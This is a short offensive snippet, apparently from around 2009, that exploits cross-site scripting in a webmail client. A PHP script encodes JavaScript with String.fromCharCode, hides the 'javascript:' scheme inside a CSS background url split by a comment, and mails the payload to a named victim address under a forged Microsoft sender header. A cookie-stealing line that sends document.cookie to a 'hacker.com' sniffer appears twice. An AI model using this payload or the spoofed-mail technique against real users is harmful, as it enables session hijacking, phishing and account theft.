<script> messageBody = '\nPew pew!'; readmsgSetMessageBody(); </script>
<font style="background:url\(javas/**/cript:eval(String.fromCharCode([evil encoded code])))">
<?php /** * (c) Dimi4, 2009 * */ $target = "petya@ukr.net"; $subj = "Pew pew!"; $payload =""; $evilcode="alert(1);"; //img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie; $strlen= strlen($evilcode); for($i=0; $i !== $strlen; $i++) { if($i+1 == $strlen) $payload .= ord($evilcode[$i]); else $payload .= ord($evilcode[$i]).','; } $header = "From: support@microsoft.com\r\n"; $header .= "MIME-Version: 1.0\r\n"; $header .= "Content-Type: text/html\r\n"; $msg ='<font style="background:url\(javas/**/cript:eval(String.fromCharCode('.$payload.')))">'; mail($target,$subj,$msg,$header); ?>
img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;